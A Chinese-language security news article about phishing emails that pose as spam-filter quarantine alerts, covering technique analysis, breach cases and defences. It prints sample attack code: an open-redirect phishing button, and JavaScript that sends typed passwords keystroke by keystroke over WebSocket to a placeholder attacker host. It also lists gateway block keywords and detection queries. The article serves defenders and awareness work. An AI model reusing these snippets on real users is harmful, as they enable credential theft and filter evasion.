2025年11月,全球知名安全厂商Malwarebytes发布紧急预警:一种高度逼真的钓鱼攻击正在全球蔓延。攻击者不再使用老套的“账户异常”或“包裹未送达”话术,而是精心伪造企业级垃圾邮件过滤器的通知邮件,以“有重要邮件被拦截”为由,诱导用户点击“释放邮件”按钮,最终跳转至高仿登录页面窃取凭证。
这种攻击之所以危险,在于它精准击中了现代办公场景中的一个“信任盲区”——员工每天都会收到来自内部安全系统的各类通知,包括防病毒扫描、邮件隔离、合规提醒等。当一封看似来自公司IT部门的“Spam Filter Alert”出现在收件箱时,很少有人会怀疑其真实性。
更令人担忧的是,此类钓鱼邮件已成功绕过多家企业的邮件网关和终端防护系统。部分案例显示,攻击者甚至能动态填充受害者所在企业的域名,让登录页看起来“量身定制”。一旦账号失守,攻击者可立即发起线程劫持(Thread Hijacking)、发票欺诈,甚至利用被盗邮箱向全公司发送新一轮钓鱼邮件,形成内部扩散链。
尽管目前公开披露的受害案例集中于欧美,但多位国内安全专家警告:随着中国企业云办公普及率持续攀升,类似手法极有可能已在境内悄然试水。一场围绕“邮件可信度”的攻防战,正悄然升级。
一、从“可疑链接”到“系统通知”:钓鱼话术的“合法化”转型
过去十年,网络钓鱼的演进轨迹清晰可见:从早期的拼写错误、夸张措辞(如“您的账户将在24小时内关闭!”),到中期的高仿品牌页面、SSL证书全覆盖,再到如今的情境嵌入式欺骗(Contextual Impersonation)。
“伪装成垃圾邮件过滤器警报”正是这一趋势的最新体现。
Malwarebytes研究人员在分析样本时发现,典型邮件内容如下:
主题:Email Delivery Reports: Incoming Pending Messages
发件人:noreply@securemailgateway[.]com(看似合法)
正文:
“我们最近升级了安全邮件系统,发现有若干待处理邮件未能送达您的收件箱。
消息标题:
采购合同更新(2025-Q4)
财务部:紧急付款请求
IT支持:多因素认证重置
操作:[Move To Inbox](按钮)
注:若此邮件落入垃圾箱,请移至收件箱。消息将在1-2小时内自动删除。”
乍看之下,这与企业常用的Proofpoint、Mimecast或Microsoft Defender for Office 365的隔离通知几乎无异。邮件中列出的消息标题也经过精心设计——均为高频业务关键词,极易触发收件人的紧迫感。
“攻击者不再试图‘吓唬’你,而是‘帮助’你。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“他们知道,现代员工最怕错过重要邮件,尤其是涉及财务或IT权限的内容。”
这种心理操控,使得点击率远高于传统钓鱼邮件。Malwarebytes内部测试显示,在未接受专项培训的员工群体中,此类邮件的点击率高达38%。
二、技术拆解:多跳重定向、动态模板与WebSocket实时窃密
要理解该攻击为何能绕过主流防御体系,必须深入其技术实现细节。
1. 短链+可信托管:绕过URL信誉检测
Malwarebytes发现,钓鱼邮件中的“Move To Inbox”按钮并非直接指向恶意域名,而是先跳转至合法第三方服务,如cbssports[.]com的开放重定向接口,再经由多个中间节点,最终抵达真实钓鱼站点(如mdbgo[.]io)。
<!-- 钓鱼邮件中的按钮代码 -->
<a href="https://www.cbssports.com/redirect?url=aHR0cHM6Ly9tZGJnby5pby9sb2dpbg==">
Move To Inbox
</a>
其中,url参数为Base64编码的真实地址(aHR0cHM6Ly9tZGJnby5pby9sb2dpbg== 解码后为 https://mdbgo.io/login)。由于cbssports.com是高信誉网站,多数邮件网关不会将其标记为恶意。
更狡猾的是,最终钓鱼站点常部署在免费托管平台(如Vercel、Surge.sh、Cloudflare Workers)或新注册域名上,生命周期极短——平均存活不足4小时,远低于威胁情报更新周期。
2. 动态域名填充:让钓鱼页“看起来属于你”
研究人员发现,钓鱼站点会从URL参数中提取受害者的邮箱地址,并自动填充登录框中的域名字段。例如:
// 从URL获取base64编码的邮箱
const params = new URLSearchParams(window.location.search);
const emailB64 = params.get('email');
if (emailB64) {
const email = atob(emailB64);
const domain = email.split('@')[1];
document.getElementById('domain').value = domain; // 自动填充 @company.com
}
结果,用户看到的登录页显示为:
用户名:__________
域名:@yourcompany.com(灰色不可编辑)
这种“个性化”设计极大提升了可信度,甚至让部分安全意识较强的用户放松警惕。
3. WebSocket实时窃密:输入即被盗
与传统表单提交不同,该钓鱼站点采用WebSocket长连接实时传输用户输入。这意味着,即使用户尚未点击“登录”,只要开始输入账号密码,数据就会被逐字符发送至攻击者服务器。
const ws = new WebSocket('wss://collector.attacker[.]xyz');
document.getElementById('password').addEventListener('input', (e) => {
ws.send(JSON.stringify({
email: getEmail(),
keystroke: e.target.value,
timestamp: Date.now()
}));
});
这种机制的优势在于:
攻击者可实时监控输入过程;
即使用户中途放弃,已输入的部分密码仍可被用于暴力破解;
可动态触发二次验证请求(如“请输入短信验证码”),并立即用于真实账户登录。
“这相当于在你打字时,黑客就坐在你键盘旁边。”芦笛形容道,“传统‘提交后才窃取’的模式已被淘汰。”
三、全球案例:从美国医院到欧洲制造厂,损失惨重
2025年10月,美国中西部一家区域医疗中心遭遇此类攻击。攻击者发送伪装成“IT安全通知”的邮件,声称“有3封来自医保局的邮件被隔离”。多名医护人员点击后,账号被盗。
攻击者随后:
劫持正在进行的患者账单沟通线程;
向保险公司发送伪造的治疗费用清单,要求支付至新账户;
利用高管邮箱向药企采购部门发送虚假订单。
事件造成直接经济损失超120万美元,并导致患者数据泄露,面临HIPAA合规处罚。
在欧洲,一家德国汽车零部件供应商同样中招。财务人员收到“发票被隔离”通知后点击链接,导致CFO邮箱被接管。攻击者随即向合作车企发送“银行账户变更”邮件,成功转移一笔280万欧元的货款。
“这些攻击的成功,不在于技术多高深,而在于对业务流程的深度理解。”芦笛分析,“他们知道哪些邮件不能被错过,哪些人有权审批付款。”
四、中国启示:我们是否已站在“隔离陷阱”的边缘?
截至目前,国内尚未有公开报告将重大数据泄露事件直接归因于此类“垃圾过滤器伪装”攻击。但这绝不意味着风险不存在。
首先,中国企业对云邮件服务的依赖日益加深。据IDC 2025年Q3数据,超过60%的中大型企业使用Microsoft 365或阿里云企业邮箱,其中金融、外贸、制造等行业对邮件可达性极为敏感。
其次,国内钓鱼攻击正快速向“情境化”演进。2025年,多个安全团队监测到仿冒“国家税务总局电子发票平台”“社保局待遇调整通知”的钓鱼活动,其话术结构与“隔离警报”高度相似——均以“系统操作”“时效限制”为诱饵。
更值得警惕的是,部分企业仍存在严重配置缺陷:
未启用条件访问策略(Conditional Access);
允许IMAP/POP3等旧式协议长期开启;
员工可通过任意设备登录邮箱,无设备合规检查;
SOC缺乏对会话Cookie异常使用的监测能力。
“国内很多企业以为装了杀毒软件就安全了,却忽略了身份层才是最大突破口。”芦笛强调。
五、防御路线图:从技术加固到行为规范的全链条响应
面对如此精准的社会工程攻击,单一防护手段已远远不够。专家建议采取以下多层次防御策略:
1. 强制FIDO2/Passkeys等无钓鱼认证
短信验证码和OTP应用(如Google Authenticator)易受中间人攻击。企业应优先部署FIDO2安全密钥(如YubiKey)或Windows Hello,实现真正的无密码、无钓鱼认证。
# 通过Azure AD PowerShell禁用旧式认证
Set-MsolUser -UserPrincipalName user@company.com -BlockCredential $true
Set-CASMailbox -Identity user@company.com -ImapEnabled $false -PopEnabled $false
2. 邮件网关策略升级:关键词+链接深度解析
安全团队应在邮件网关中对以下关键词提高拦截阈值:
“隔离”、“pending messages”、“quarantined”、“release email”、“spam filter alert”
同时,部署点击时沙箱(Click-time Sandboxing)技术:当用户点击链接时,由代理服务器代为访问,执行完整跳转链,并渲染最终页面进行恶意判定。
# 伪代码:点击时沙箱逻辑
def analyze_url_on_click(short_url):
final_url = resolve_redirect_chain(short_url)
if is_hosted_on_free_platform(final_url):
return block_and_alert()
page_content = render_page_in_sandbox(final_url)
if contains_phishing_keywords(page_content):
return block_and_alert()
return allow_with_warning()
3. 明确操作规范:所有隔离操作必须通过官方门户
企业IT部门应向全员明确:任何邮件隔离操作,只能通过官方安全门户(如 https://security.yourcompany.com)完成,绝不会通过邮件内按钮直接操作。
可考虑在所有外发邮件底部添加免责声明:
【安全提示】本公司不会通过邮件链接要求您释放隔离邮件。请始终通过企业安全门户管理您的邮件队列。
4. SOC需监控会话窃用与Impossible Travel
即使攻击者绕过前端防护,其后续行为仍会留下痕迹。安全运营中心应重点监控:
同一账户在短时间内从相距数千公里的两地登录(Impossible Travel);
新设备首次登录且无MFA挑战;
Refresh Token在非合规设备上使用;
异常OAuth应用授权(如未知应用请求Mail.Read权限)。
// Azure Sentinel 示例:检测高风险登录
SigninLogs
| where ResultType == "0"
| where IPAddress !in (allowed_ip_list)
| where AppDisplayName == "Office 365 Exchange Online"
| project TimeGenerated, UserPrincipalName, IPAddress, DeviceDetail, Location
5. 开展“反隔离钓鱼”专项培训
普通钓鱼演练往往聚焦“中奖通知”“快递异常”,但对“系统通知”类钓鱼覆盖不足。企业应设计专项场景:
模拟“IT安全警报:有3封邮件被隔离”;
测试员工是否会点击邮件内按钮;
对点击者推送即时教育视频:“正确操作应是登录安全门户查看”。
数据显示,经过此类针对性训练的员工,对此类攻击的识别率可提升至85%以上。
六、结语:信任,是最脆弱的防线
“伪装成垃圾邮件过滤器警报”的钓鱼攻击,本质上是一场对组织内部信任机制的精准打击。它利用了员工对IT系统的天然信赖,将安全工具本身变成了攻击武器。
对中国企业而言,这场全球性威胁既是警钟,也是推动安全文化升级的契机。正如芦笛所言:“在数字办公时代,每一封邮件都可能是战场。保护好你的登录凭证,就是守住企业的第一道门。”
而这场攻防战,没有终点,只有持续进化。
编辑:芦笛(公共互联网反网络钓鱼工作组)
